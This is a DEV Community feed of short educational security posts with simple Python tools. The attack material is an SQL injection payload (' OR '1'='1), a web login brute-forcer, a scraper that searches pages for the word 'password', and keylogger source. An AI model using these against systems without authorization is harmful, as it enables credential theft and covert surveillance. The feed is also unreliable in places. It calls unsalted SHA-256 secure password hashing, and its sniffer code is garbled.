DEV Community: Mohana Vamsi

Artificial Intelligence and Ethical Hacking

Mohana Vamsi — Sun, 15 Dec 2024 16:18:50 +0000

AI brings into ethical hacking a complete automation of vulnerability scanning and penetration testing.

Example:
Astra Pentest is an AI-based tool that uses artificial intelligence to launch simulated attacks at a speed faster than conventional methods and searches for weak points.

Real-World Scenario:
An artificial intelligence tool, which took only minutes, uncovered SQL injection weaknesses in a finance app during a cyber assessment; this, saved weeks of work that manual effort would have taken.

Limitations:
Because AI lacks creativity, it may not cover all non-conventional vectors of threat; hence, human ethical hackers are also needed.

The combination of AI and human effort will go a long way toward making security very resilient in any organization.

AI in Fighting Phishing

Mohana Vamsi — Sun, 15 Dec 2024 16:16:08 +0000

Phishing is an attack that is usually aimed at manipulating users into giving away sensitive information. AI plays an active role in countering these scams.

How AI helps:

Email Filtering: A machine learning model can identify a phishing email by tracing suspicious patterns and links and even sender behavior.
Real-time alerts: Phishing warning from an AI-powered browser alerting a user browsing a known phishing site is based on the real-time threat database.
Example:
For example, Gmail from Google uses AI on their backend to block nearly 99.9% visiting phishing emails.

But now the attackers have come up with another method with the aid of AI, which personalizes phishing emails to an extent that they can be difficult to detect. For instance, they can generate extremely sophisticated emails based on social media profiles, making detection almost impossible.

Take Away: While AI makes defenses more robust against phishing attacks, the human element of vigilance cannot be overemphasized. Don't click on links or attachments from untrustworthy sources!

AI in Cybersecurity - The Double-Edged Sword

Mohana Vamsi — Sun, 15 Dec 2024 16:13:56 +0000

Despite revolutionizing cybersecurity, artificial inteligence is not entirely free of challenges. One set of problems arises from the fact that, on the one hand, it helps people accelerate their searches for threats by sifting through huge datasets and identifying anomalies in behavior, while, on the other hand, it enables attackers to innovate more intelligent versions of their malware and phishing threats.

Positive Effects:

Threat Detection: AI in SIEM systems, for example, can easily detect any unusual behavior using machine learning, thus flagging possible threats in real time.
Predictive Analytics: AI can forecast the probable vulnerabilities and attacks that might occur based on past events.
Automation: Reduces manual workload through automation of repetitive tasks, such as log analysis.
Negative Impact:

AI-Based Attacks: Various social engineering attacks using deepfake generators and automated phishing kits create more believable attacks.
Bias and False Positives: Ill-trained AI causes false alarms or may even fail to alert about serious threats.
This is the support that AI gives to security; however, as defenders innovate, so do attackers. Finding the right balance between these two is very important to ensure that a safer digital future is possible.

Password Hashing in Python

Mohana Vamsi — Sun, 15 Dec 2024 16:12:32 +0000

One must never store passwords plainly. Let's learn the technique of hashing passwords securely using Python:

import hashlib

password = "securepassword"

hashed = hashlib.sha256(password.encode()).hexdigest()

print(f"Hashed password: {hashed}")

Hashing means that even if someone manages to break into the database, they will not get to know what the plaintext passwords are. Now, most modern systems use advanced algorithms like bcrypt, which also include salting.

Pro tip: Never ever roll out your own cryptographic stuff; it will lead you nowhere. Just use proven libraries like bcrypt or argon2.

This builds trust and makes the user secure.

Two-Factor Authentication System

Mohana Vamsi — Sun, 15 Dec 2024 16:08:20 +0000

This project implements a basic TOTP (Time-Based One-Time Password) generator using Python's pyotp library.

Code Example:

import pyotp

import time

key = pyotp.random_base32()

totp = pyotp.TOTP(key)

print("Generated OTP:", totp.now())

time.sleep(30)

print("Next OTP:", totp.now())

Use Case: Useful for understanding the workings of two-factor authentication and how time-based codes are generated.

Tip: Integrate this with a login system to simulate 2FA in action.

Basic Network Scanner

Mohana Vamsi — Sun, 15 Dec 2024 16:06:44 +0000

This script written with Python scans the local network for identifying active devices. Useful for network monitoring to check the unapproved device on your network.

Code Example:

import os

def scan_network(network):

print("Scanning network : " + network)

response = os.popen("ping -c 1 " + network).read()

if response.find('1 packets transmitted, 1 received') >= 0:

print("The network is online-" + network)

else:

print("The network is offline-" + network)

for i in range(1, 255):

scan_network("192.168.1." + str(i));

Use Case: This can be used further in the audit of networks to identify unauthorized devices that may have connected to your system.

Tip: You can modify the script to scan your entire subnet and produce an inventory of devices connected to your network.

SQL Injection Tester

Mohana Vamsi — Sun, 15 Dec 2024 16:04:45 +0000

The purpose of this project is to demonstrate how SQL injection works. This malicious functionality sends SQL queries to a vulnerable web application for testing the injection susceptibility.

Code Example:

import requests

def test_sql_injection(url):

payload = "' OR '1'='1"

response = requests.get(url, params={'id': payload})

if "Welcome" in response.text:

print("Vulnerable to SQL Injection")

else:

print("Safe")

url = "http://example.com/product?id="

test_sql_injection(url)

Use Case: This is a script that tests web applications against SQL injection vulnerabilities and shows how adversaries generally manipulate databases.

Tip: Make sure to always sanitize all user inputs into the web applications against SQL injection attacks.

Brute Force Web Login Tester

Mohana Vamsi — Sun, 15 Dec 2024 16:03:27 +0000

This tool helps to brute force a web form by trying different combinations of username and passwords. This is particularly useful to security testers to find out bad credentials.

Code Example:

import requests

def brute_force_login(url, usernames, passwords):

for username in usernames:

for password in passwords:

response = requests.post(url, data={'username': username, 'password': password})

if "Login successful" in response.text:

print(f"Found: {username}:{password}")

return

print("No valid credentials found.")

url="http://example.com/login"

usernames=["admin","user","guest"]

passwords=["1234","password","admin123"]

brute_force_login(url,usernames,passwords)

Use Case: This can be the primary objective in penetration testing to get weak logon credentials and show the dismal results of poor password policies.

Tip: Never use this on unauthorized websites.

Simple Wap Scraper for Sensitive Information

Mohana Vamsi — Sun, 15 Dec 2024 16:01:57 +0000

This python project will show how web scrapers can be designed for grabbing sensitive information from public websites. The script, in short, looks for keywords relevant to personal information.

Example Code:

import requests

from bs4 import BeautifulSoup

def scrape_sensitive_data(url):

response = requests.get(url)

soup = BeautifulSoup(response.text, 'html.parser')

for element in soup.find_all(text=True):

if "password" in element.lower():

print(f"Sensitive data found: {element.strip()}")

url=input("Enter URL to scrape: ")

scrape_sensitive_data(url)

Use Case: this script could be used for penetration testing website security for sensitive information exposure such as passwords or emails.

Note: Scraping has legal implications, so always ask permission from the website owners.

Keylogger

Mohana Vamsi — Sun, 15 Dec 2024 15:59:52 +0000

A keylogger records keystrokes and stores them in a log file. This project is for demonstration purposes to show how malefactors use keyloggers to steal data.

Code Example:

import pynput.keyboard  

def on_press(key):  
    try:  
        with open("log.txt", "a") as log:  
            log.write(f"{key.char}")  
    except AttributeError:  
        pass  

listener = pynput.keyboard.Listener(on_press=on_press)  
listener.start()  
listener.join()

Use Case: Learn how keyloggers work, but of course use it responsibly and in controlled, authorized environments only.

Tip: Always get consent from users before running any keylogging software.

HTTP Request Header Analyzer

Mohana Vamsi — Sat, 14 Dec 2024 17:27:06 +0000

This is a project mainly focused on to analyzes HTTP headers to detect potential security issues in web applications, like missing security headers or improper configurations.

code:

import requests  

def analyze_headers(url):  
    response = requests.get(url)  
    headers = response.headers  
    for header, value in headers.items():  
        print(f"{header}: {value}")  

url = input("Enter URL to analyze: ")  
analyze_headers(url)

Use Case: This script is useful for web security . You can analyze if a website has security headers like Strict-Transport-Security or X-Content-Type-Options, which protect against common attacks such as cross-site scripting (XSS).

Tip: Missing or improperly configured headers can indicate vulnerabilities, and this script helps you quickly identify them.

Network Packet Sniffer

Mohana Vamsi — Sat, 14 Dec 2024 17:20:00 +0000

This tool is used in capturing packets from a network and display summary of the captured packets with the view being used in analyzing the traffic in a network. It uses scapy library which is very efficient for packet manipulation on wire.

Code Example:

from scapy.all import sniff

def packet_callback(packet):

print(packet.summary())

It’s worth to sniff(prn=packet_callback, count=10)

Use Case: This project is also suitable for carrying out the monitoring of the network as well as identifying any malicious activity. It assists security experts to monitor network data and detect threats like man in the middle or data leakage.

Tip: This tool should be used only on networks that you control or have direct permission to scan because is improper to scan traffic of other networks as that is considered a crime.